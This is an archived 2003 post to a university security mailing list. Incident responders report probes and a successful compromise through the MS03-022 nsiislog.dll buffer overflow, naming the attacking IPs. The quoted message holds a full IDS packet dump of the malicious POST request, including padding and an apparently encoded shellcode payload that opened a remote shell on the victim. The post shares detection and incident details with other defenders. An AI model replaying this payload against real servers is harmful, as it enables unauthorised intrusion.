[unisog] Successful attack using MS03-022 vuln

Jordan Wiens jwiens at nersp.nerdc.ufl.edu
Thu Sep 25 15:29:03 GMT 2003


We've seen compromises via this exploit as well.  First one was approx.
2-3 months ago and took a while to figure out what it was, I don't think
dragon had logs for it at that point.

Fortunately, this is not the default install config and requires someone
to be install happy and click the 'install everything' option of the
webserver.

-- 
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061

On Wed, 24 Sep 2003, Mike Iglesias wrote:

> We've been seeing probing against web servers looking for
> /scripts/nsiislog.dll, which is used by Windows Media Services to
> deliver multicast streaming media (nsiislog.dll is the subject of MS03-022,
> which fixes a buffer overflow in it).  The probes are usually a "GET
> /scripts/nsiislog.dll".
>
> We have also seen some "POST /scripts/nsiislog.dll" that look like
> this:
>
> POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
> Accept: */*{D}{A}
> User-Agent: NSPlayer/4.1.0.3917{D}{A}
> Content-Type: text/plain{D}{A}
> Content-Length: 9996{D}{A}
> Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
> Connection: Close{D}{A}
> {D}{A}
> MX_STATS_LogLine: *** huge line to cause a buffer overflow ***
>
> The huge MX_STATS_LogLine up until today did not carry much other than
> repeated hex 'cc' bytes.
>
> Today we had a system successfully hacked via the buffer overflow.  About
> 20 seconds after the "POST" attack, they had a telnet session open using
> port 34816 on the target system.  I cannot tell what they did to the
> system once they had access.
>
> The attacks came from 213.129.194.25 and 80.56.228.218 (both in the
> Netherlands).  I've appended a packet dump from our Dragon IDS below
> in case anyone finds it useful.
>
>
> Mike Iglesias                          Email:       iglesias at draco.acs.uci.edu
> University of California, Irvine       phone:       949-824-6926
> Network & Academic Computing Services  FAX:         949-824-2069
>
> POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
> Accept: */*{D}{A}
> User-Agent: NSPlayer/4.1.0.3917{D}{A}
> Content-Type: text/plain{D}{A}
> Content-Length: 9996{D}{A}
> Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
> Connection: Close{D}{A}
> {D}{A}
> MX_STATS_LogLine: {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> <repeated lines removed>
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}
> {CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{CC}{EB}{2}{EB}{5}{E8}{F9}{FF}{FF}{FF}
> [{81}{EB}MC"{11}{8B}{C3}{5}fC"{11}f{B9}{15}{3}{80}0{FB}@g{E2}{F9}3{A3}{F9}{FB}r
> fS{6}{4}{4}vf7{6}{4}{4}{A8}@{F6}{BD}{D9}{EA}{F8}fS{6}{4}{4}{A8}{93}{FB}{FB}
> {4}{4}{13}{91}{FA}{FB}{FB}C{CD}{BD}{D9}{EA}{F8}~S{6}{4}{4}{AB}{4}n7{6}{4}
> {4}{F0};{F4}{7F}{BE}{FA}{FB}{FB}vf;{6}{4}{4}{A8}@{BA}{BD}{D9}{EA}{F8}fS{6}{4}
> {4}{A8}{AB}{13}{CC}{FA}{FB}{FB}v~{8F}{5}{4}{4}{AB}{93}{FA}{FA}{FB}{FB}{4}nK{6}
> {4}{4}{C8} {A8}{A8}{A8}{91}{FD}{91}{FA}{91}{F9}{4}n;{6}{4}{4}r~{A7}{5}{4}
> {4}{9D}<~{9F}{5}{4}{4}{F9}{FB}{9D}<~{9D}{5}{4}{4}s{FB}<~{93}{5}{4}{4}{FB}
> {FB}{FB}{FB}vf{9F}{5}{4}{4}{91}{EB}{A8}{4}N{A7}{5}{4}{4}{4}nG{6}{4}{4}
> {F0};{8F}{E8}vn{9C}{5}{4}{4}{5}{F9}{{C1}{FB}{F4}{7F}F{FB}{FB}{FB}{10}/{91}{FA}
> {4}N{A7}{5}{4}{4}{4}nC{6}{4}{4}{F0};{F4}~^{FB}{FB}{FB}<~{9B}{5}{4}{4}{EB}
> {FB}{FB}{FB}v~{9B}{5}{4}{4}{AB}v~{9F}{5}{4}{4}{AB}{4}N{A7}{5}{4}{4}{4}
> nO{6}{4}{4}r~{A3}{5}{4}{4}{7}vF{F3}{5}{4}{4}{C8};B{BF}{FB}{FB}{FB}{8}Q
> <~{CF}{5}{4}{4}{FB}{FA}{FB}{FB}p~{A3}{5}{4}{4}r~{BF}{5}{4}{4}r~{B3}{5}{4}
> {4}r~{BB}{5}{4}{4}<~{F3}{5}{4}{4}{BF}{FB}{FB}{FB}{C8} v~{3}{6}{4}{4}{AB}
> v~{F3}{5}{4}{4}{AB}{A8}{A8}{93}{FB}{FB}{FB}{F3}{91}{FA}{A8}{A8}C{8C}{BD}{D9}{EA}
> {F8}~S{6}{4}{4}{AB}{A8}{4}n?{6}{4}{4}{4}N{A3}{5}{4}{4}{4}nW{6}{4}{4}
> {12}{A0}{4}{4}{4}{4}n3{6}{4}{4}{13}v{FA}{FB}{FB}3{EF}{FB}{FB}{AC}{AD}{13}{FB}
> {FB}{FB}{FB}z{D7}{DF}{F9}{BE}{D9}{EA}C{E}{BE}{D9}{EA}{F8}{FF}{DF}x?{FF}{AB}{9F}{9C}
> {4}{CD}{FB}{FB}r{9E}{3}{13}{FB}{FB}{FB}{FB}z{D7}{DF}{D8}{BE}{D9}{EA}C{AC}{BE}{D9}
> {EA}{F8}{FF}{DF}x?{FF}r{BE}{7}{9F}{9C}r{DD}{FB}{FB}p{86}{F3}{9D}z{C4}{B6}{A1}{8E}
> {F4}p{C}{F8}{8D}{C7}z{C5}{AB}{BE}{FB}{FB}{8E}{F9}{10}{F3}z{14}{FB}{FB}{FA}{FB}{10}
> {19}r{86}{B}r{8E}{17}p{86}{F7}Bm{FB}{FB}{FB}{C9};{9}Ur{86}{F}p4{D0}{B6}{F7}p{AD}
> {83}{F8}{AE}{B}p{A1}{DB}{F8}{A6}{B}{C8};p{C0}{F8}{86}{B}p{8E}{F7}{AA}{8}]{8E}
> {FE}x?{FF}{10}{F1}{A2}x8{FF}{BB}{C0}{B9}{E3}{8E}{1F}{C0}{B9}{E3}{8E}{F9}{10}{B8}p
> {89}{DF}{F8}{8E}{B}*{1B}{F8}={F4}L{FB}p{81}{E7}:{1B}{F9}{F8}{BE}{B}{F8}<p{FB}{F8}
> {BE}{B}p{B6}{F}r{B6}{F7}p{A6}{EB}r{F8}x{96}{EB}{FF}p{8E}{17}{{C2}{FB}{8E}|{9F}{9C}
> t{FD}{FB}{FB}x?{FF}{A5}{A4}29{F7}{FB}p{86}{B}{12}{99}{4}{4}{4}3{FB}{FB}{FB}p{BE}
> {EB}zSg{FB}{FB}{FB}{FB}{FB}{FA}{FB}C{FB}{FB}{FB}{FB}28{B7}{94}{9A}{9F}{B7}{92}{99}
> {89}{9A}{89}{82}{BA}{FB}{BE}{83}{92}{8F}{AB}{89}{94}{98}{9E}{88}{88}{FB}{B8}{89}{9E}
> {9A}{8F}{9E}{AB}{89}{94}{98}{9E}{88}{88}{BA}{FB}{FB}{AC}{A8}{C9}{A4}{C8}{C9}{D5}{BF}
> {B7}{B7}{FB}{AC}{A8}{BA}{A8}{94}{98}{90}{9E}{8F}{BA}{FB}{99}{92}{95}{9F}{FB}{97}{92}
> {88}{8F}{9E}{95}{FB}{9A}{98}{98}{9E}{8B}{8F}{FB}{AC}{A8}{BA}{A8}{8F}{9A}{89}{8F}{8E}
> {8B}{FB}{98}{97}{94}{88}{9E}{88}{94}{98}{90}{9E}{8F}{FB}{FB}{98}{96}{9F}{FB}{E9}{C4}
> {FC}{FF}{FF}t{F9}u{F7}3{13}{F0}@
>



More information about the unisog mailing list